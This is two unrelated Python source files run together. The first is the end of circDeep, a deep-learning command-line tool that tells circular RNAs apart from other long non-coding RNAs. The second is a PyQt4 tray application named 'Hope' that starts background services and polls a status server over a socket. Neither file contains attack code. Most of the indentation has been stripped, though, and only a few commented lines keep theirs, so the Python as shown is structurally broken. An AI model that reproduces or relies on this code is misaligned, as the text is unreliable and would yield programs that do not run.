def test_circDeep(data_dir, model_dir, genome, bigwig, gtf, testing_bed, seq=True, rcm=True, cons=True,
outfile='prediction.txt',model1=None):
testing_fasta, testing_sequences, cons_file, rcm_file, seq_file = extract_features_testing(testing_bed, genome,
bigwig, gtf, data_dir,model_dir)
test_data = load_data(data_dir, seq, rcm, cons, True, cons_file, rcm_file, seq_file)
# true_y = test_data["Y"].copy()
testing = []
if seq:
seq_data, seq_scaler = preprocess_data(test_data["seq"])
testing.append(seq_data)
if rcm:
rcm_data, rcm_scaler = preprocess_data(test_data["rcm"])
testing.append(rcm_data)
if cons:
cons_data, cons_scaler = preprocess_data(test_data["cons"])
testing.append(cons_data)
    if model1 is None:
        try:
            # load_model sometimes fails for users because of mismatched Keras/TensorFlow
            # versions, so we recommend using recent versions of both. As a fallback we keep
            # the extracted training features and briefly retrain the model each time a
            # BED file is tested.
            model1 = load_model(os.path.join(model_dir, 'bestmodel_circDeep.pkl'))
except:
model1 = train_circDeep(data_dir, model_dir, genome, bigwig, gtf, None, None, seq, rcm,
cons, False)
# model = joblib.load(os.path.join(model_dir, 'bestmodel_circDeep.pkl'))
# model = joblib.load( os.path.join(model_dir,'model.pkl'))
predictions = model1.predict_proba(testing)
# pdb.set_trace()
# auc = roc_auc_score(true_y, predictions[:, 1])
# print "Test AUC: ", auc
# fw.write(str(auc) + '\n')
# mylabel = "\t".join(map(str, true_y))
fw = open(outfile, 'w')
myprob = "\n".join(map(str, predictions[:, 1]))
# fw.write(mylabel + '\n')
fw.write(myprob)
fw.close()
def run_circDeep(parser):
data_dir = parser.data_dir
out_file = parser.out_file
train = parser.train
model_dir = parser.model_dir
predict = parser.predict
seq = parser.seq
rcm = parser.rcm
genome = parser.genome
bigwig = parser.bigwig
gtf = parser.gtf
    positive_bed = parser.positive_bed
    negative_bed = parser.negative_bed
    cons = parser.cons
    testing_bed = parser.testing_bed
if not os.path.exists(model_dir):
os.makedirs(model_dir)
if predict:
train = False
if train:
print('model training')
model=train_circDeep(data_dir, model_dir, genome, bigwig, gtf, positive_bed, negative_bed, seq, rcm,
cons,True)
test_circDeep(data_dir, model_dir, genome, bigwig, gtf, testing_bed, seq, rcm, cons,out_file,model)
else:
print('model prediction')
model=None
test_circDeep(data_dir, model_dir, genome, bigwig, gtf, testing_bed, seq, rcm, cons,
out_file,model)
def parse_arguments(parser):
parser.add_argument('--data_dir', type=str, default='data/', metavar='<data_directory>',
help='Under this directory, you will have descriptors files ')
parser.add_argument('--train', type=bool, default=True, help='use this option for training model')
parser.add_argument('--model_dir', type=str, default='models/',
help='The directory to save the trained models for future prediction')
parser.add_argument('--predict', type=bool, default=False,
help='Predicting circular RNAs. if using train, then it will be False')
parser.add_argument('--out_file', type=str, default='prediction.txt',
help='The output file used to store the prediction probability of testing data')
parser.add_argument('--seq', type=bool, default=True, help='The modularity of ACNN-BLSTM seq')
parser.add_argument('--rcm', type=bool, default=True, help='The modularity of RCM')
parser.add_argument('--cons', type=bool, default=True, help='The modularity of conservation')
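    # Note: argparse's type=bool treats any non-empty string (including 'False') as True,
    # so the boolean options above are effectively controlled by their defaults; passing
    # an empty string (e.g. --predict '') is the only way to get False from the command line.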
parser.add_argument('--genome', type=str, default='data/hg38.fasta', help='The Fasta file of genome')
parser.add_argument('--gtf', type=str, default='data/Homo_sapiens.Ensembl.GRCh38.82.gtf',
help='The gtf annotation file. e.g., hg38.gtf')
parser.add_argument('--bigwig', type=str, default='data/hg38.phyloP20way.bw',
help='conservation scores in bigWig file format')
parser.add_argument('--positive_bed', type=str, default='data/circRNA_dataset.bed',
help='BED input file for circular RNAs for training, it should be like:chromosome start end gene')
parser.add_argument('--negative_bed', type=str, default='data/negative_dataset.bed',
help='BED input file for other long non coding RNAs for training, it should be like:chromosome start end gene')
parser.add_argument('--testing_bed', type=str, default='data/test.bed',
help='BED input file for testing data, it should be like:chromosome start end gene')
args = parser.parse_args()
return args
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description='circular RNA classification from other long non-coding RNA using multimodal deep learning')
args = parse_arguments(parser)
run_circDeep(args)
|
qt_start.pyw
|
import sys
import time
from socket import socket
from threading import Thread
from PyQt4.QtGui import *
import start_services
import settings
import os.path
from multiprocessing import Process
class Window(QMainWindow):
def __init__(self):
super(Window, self).__init__()
self.create_main_window()
self.create_actions()
self.create_tray_icon()
self.run_services()
self.run_update_status_thread()
def create_main_window(self):
self.icon = QIcon(os.path.join(settings.app_dir, 'docs', 'hope.ico'))
self.resize(320, 180)
self.setWindowTitle("Hope")
self.setWindowIcon(self.icon)
self.restart_btn = QPushButton('Restart Services', self)
self.restart_btn.resize(200, 80)
self.restart_btn.move(60, 50)
self.restart_btn.setFont(QFont("Consolas", 16))
self.restart_btn.clicked.connect(self.restart)
self.statusBar()
def restart(self):
self.restart_btn.setEnabled(False)
reload(start_services)
self.stop_services()
self.run_services()
self.restart_btn.setEnabled(True)
self.statusBar().showMessage("Services restarted")
self.run_update_status_thread()
def create_actions(self):
self.quit_action = QAction("&Quit", self, triggered=self.close)
def create_tray_icon(self):
self.tray_icon_menu = QMenu(self)
self.tray_icon_menu.addAction(self.quit_action)
self.tray_icon = QSystemTrayIcon(self)
self.tray_icon.setContextMenu(self.tray_icon_menu)
self.tray_icon.setIcon(self.icon)
self.tray_icon.activated.connect(self.tray_activated)
self.tray_icon.setToolTip("Hope")
self.tray_icon.show()
def tray_activated(self, reason):
if reason == 2:
if self.isVisible():
self.hide()
else:
self.showNormal()
def closeEvent(self, event):
self.hide()
event.ignore()
def run_services(self):
self.statusBar().showMessage("Running Services ...")
self.process = Process(target=start_services.run_services)
self.process.start()
def stop_services(self):
self.statusBar().showMessage("Stopping Services ...")
if self.process:
self.process.terminate()
self.process = None
def update_status(self):
time.sleep(60)
s = socket()
s.connect(settings.info_server_address)
while True:
s.sendall('info')
data = s.recv(4096)
self.statusBar().showMessage(data)
time.sleep(settings.ip_check_interval)
def run_update_status_thread(self):
t = Thread(target=self.update_status)
t.setDaemon(True)
t.start()
def close(self):
self.stop_services()
sys.exit()
if __name__ == '__main__':
app = QApplication(sys.argv)
w = Window()
# w.show()
sys.exit(app.exec_())
|